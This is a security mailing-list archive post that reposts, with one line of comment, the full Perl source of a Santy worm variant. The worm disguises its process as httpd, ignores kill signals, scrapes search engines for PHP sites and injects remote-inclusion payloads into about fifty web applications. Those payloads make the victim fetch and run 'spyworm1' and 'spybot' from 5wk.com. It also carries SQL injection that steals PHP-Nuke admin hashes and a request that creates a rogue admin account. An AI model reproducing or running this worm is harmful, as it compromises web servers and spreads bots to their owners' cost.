lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: stfunub at gmail.com (Andrew Smith)
Subject: Santy Variant attacking about 50
	PHP-applications

Covered on the F-Secure weblog, the DNS has been pointed at 127.0.0.2
so no more bots will be connecting. Just posting the source incase
5wk.com dies:

#!/usr/bin/perl

#####################
####
####  ####  #### #### ####  #### #### #  # #  # ####
####  #  #  #  # #    #  #  #    #    #  # # #  #
####  ####  #  # ###  ##    #### #    #### ##   ###
####  #     #  # #    # #      # #    #  # # #  #
####  #     #### #### #  #  #### #### #  # #  # ####
####



use LWP::Simple;
use IO::Socket::INET;





my $processo = "/usr/local/sbin/httpd";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";

$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);


$lista[0] = '/modules/My_eGallery/public/displayCategory.php?basepath=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[1] = '/modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[2] = '/include/new-visitor.inc.php?lvc_include_dir=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[3] = '/_functions.php?prefix=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[4] = '/cpcommerce/_functions.php?prefix=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[5] = '/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[6] = '/modules/agendax/addevent.inc.php?agendax_path=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[7] = '/ashnews.php?pathtoashnews=cd /tmp;wget
http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[8] = '/eblog/blog.inc.php?xoopsConfig[xoops_url]=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[9] = '/pm/lib.inc.php?pm_path=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[10] = '/b2-tools/gm-2-b2.php?b2inc=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[11] = '/modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[12] = '/modules/agendax/addevent.inc.php?agendax_path=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[13] = '/includes/include_once.php?include_file=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[14] = '/e107/e107_handlers/secure_img_render.php?p=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[15] = '/shoutbox/expanded.php?conf=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[16] = '/modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*';
$lista[17] = '/admin.php?op=AddAuthor&add_aid=cake&add_name=God&add_pwd=brasnet&add_email=foo@....com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox';
$lista[18] = '/main.php?x=http://www.5wk.com/spy.gif?&cmd=cd /tmp;wget
http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[19] = '/myPHPCalendar/admin.php?cal_dir=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[20] = '/index.php/main.php?x=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[21] = '/index.php?include=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[22] = '/index.php?x=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[23] = '/index.php?open=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[24] = '/index.php?visualizar=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[25] = '/template.php?pagina=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[26] = '/index.php?pagina=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[27] = '/index.php?inc=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[28] = '/includes/include_onde.php?include_file=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[29] = '/index.php?page=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[30] = '/index.php?pg=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[31] = '/index.php?show=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[32] = '/index.php?cat=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[33] = '/index.php?file=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[34] = '/db.php?path_local=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[35] = '/index.php?site=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[36] = '/htmltonuke.php?filnavn=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[37] = '/livehelp/inc/pipe.php?HCL_path=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[38] = '/hcl/inc/pipe.php?HCL_path=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[39] = '/inc/pipe.php?HCL_path=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[40] = '/support/faq/inc/pipe.php?HCL_path=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[41] = '/help/faq/inc/pipe.php?HCL_path=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[42] = '/helpcenter/inc/pipe.php?HCL_path=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[43] = '/live-support/inc/pipe.php?HCL_path=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[44] = '/gnu3/index.php?doc=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[45] = '/gnu/index.php?doc=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[46] = '/phpgwapi/setup/tables_update.inc.php?appdir=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[47] = 'includes/calendar.php?phpc_root_path=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[48] = 'includes/setup.php?phpc_root_path=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[49] = '/inc/authform.inc.php?path_pre=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista[50] = '/include/authform.inc.php?path_pre=http://www.5wk.com/spy.gif?&cmd=cd
/tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';


while(1){

####################################
#
#  worm php injection
#  explora v?rias vuls
#
#
####################################
$nume = int rand(999);
 $procura = 'inurl:*.php?*=' .  $nume;


$caxe = ".";
$caxe1 = ".";
$caxe .= rand(9999);
$caxe1 .= rand(9999);
$arq = ".";
$arq .= int rand(9999);

open(sites,">$arq");
print sites "";
close(sites);

for($n=0;$n<900;$n += 100){
$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br",
PeerPort => 80, Proto => "tcp") or next;
print $sock "GET
/search?q=$procura&num=100&hl=pt-BR&lr=&as_qdr=all&start=$n&sa=N
HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);
$ae = "@resu";
while ($ae=~ m/<a href=.*?>.*?<\/a>/){
  $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
  $uber=$1;
	if ($uber !~/translate/)
	{
	if ($uber !~ /cache/)
	{
	if ($uber !~ /"/)
	{
	if ($uber !~ /google/)
	{
	if ($uber !~ /216/)
	{
	if ($uber =~/http/)
	{
	if ($uber !~ /start=/)
	{
	  open(arq,">>$arq");
          print arq "$uber\n";
          close(arq);
}}}}}}}}}


for($cadenu=1;$cadenu <= 991; $cadenu +=10){

@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu")
or next;
$ae = "@cade";

while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
  $ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
  $uber=$1;
  
$uber =~ s/ //g;
$uber =~ s/<b>//g;
$uber =~ s/<\/b>//g;
$uber =~ s/<wbr>//g;
open(a,">>$arq");
print a "$uber\n";
close(a);
}}

$ark = $arq; 
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo =""; 
foreach (@si){
if (!$si{$_})
{ 
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);

$a =0;
$b =0;
open(ae,"<$arq");
while(<ae>)
 {$sites[$a] = $_;
  chomp $sites[$a];
  $a++;
  $b++;}
close(ae);

for ($a=0;$a<=$b;$a++){
open (file, ">$caxe");
      print file "";
close(file);
open (file, ">$caxe1");
      print file "";
close(file);
$k=0;
$e=0;
 $data=get($sites[$a]) or next;
  while($data=~ m/<a href=".*?">.*?<\/a>/){
  $data=~ s/<a href="(.*?)">.*?<\/a>/$1/;
  $ubersite=$1;
  
  if ($ubersite =~/"/)
   {
   $nu = index $ubersite, '"';
   $ubersite = substr($ubersite,0,$nu);
   }
if ($ubersite !~/http/)
 {$ubersite = $sites[$a].'/'.$ubersite;} 
open(file,">>$caxe") || die("nao abriu caxe.txt $!");
print file "$ubersite\n"; 
close(file); 
}

$lista1 = 'http://www.5wk.com/spy.gif?&cmd=cd /tmp;wget
http://www.5wk.com/spyworm1;perl spyworm1;wget
http://www.5wk.com/spybot';
$lista2 = '|cd /tmp;wget http://www.5wk.com/spyworm1;perl
spyworm1;wget http://www.5wk.com/spybot|';
$t =0;
$y =0;
@ja;
open(opa,"<$caxe") or next;
while (<opa>)
{
 $ja[$t] = $_;
 chomp $ja[$t];
 $t++;
 $y++;
}
close(opa);
$t=1;
while ($t < $y)
   {
    if ($ja[$t] =~/=/)
      {
       $num = rindex $ja[$t], '=';
       $num += 1;
       $ja[$t] = substr($ja[$t],0,$num);    
            open (jaera,">>$caxe1") or next;
            print jaera "$ja[$t]$lista1\n";
            print jaera "$ja[$t]$lista2\n";
            close(jaera);
        $num = index $ja[$t], '=';
        $num += 1;
        $ja[$t] = substr($ja[$t],0,$num);       
        $num1 = rindex $ja[$t], '.';
        $subproc = substr($ja[$t],$num1,$num);
         
            open (jaera,">>$caxe1") or next;
            print jaera "$ja[$t]$lista1\n";
            print jaera "$ja[$t]$lista2\n";
            close(jaera);
      }
     $t++;
     }
$ark = "$caxe1"; 
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo =""; 
foreach (@si){
if (!$si{$_})
{ 
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);
	$q=0;
	$w=0;
	 @hot;
	open (ops,"<$caxe1");
	while(<ops>)
	{
	$hot[$q] = $_;
	chomp $hot[$q];
	$q++;
	$w++;
	}
	close(ops);

for($q=0;$q<=$w;$q++)
  {
 
  if ($hot[$q] =~/http/)
    {
	$tipo=get($hot[$q]) or next;
	for($tee=0;$tee<=50;$tee++){
	&recicla;
	$hot[$q] = 'http://' .$hot[$q] . $lista[$tee] ;
	$tipo=get($hot[$q]) or next;

	}
	
	
	
	
	
	}}}

}







###############################
#
#  sub rotinas
#
#
#
###############################



#######################

sub recicla{
 	substr($hot[$q], 0, 7) ="";
       	$nu = index $hot[$q], '/';
        $hot[$q] = substr($hot[$q],0,$nu);
}

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ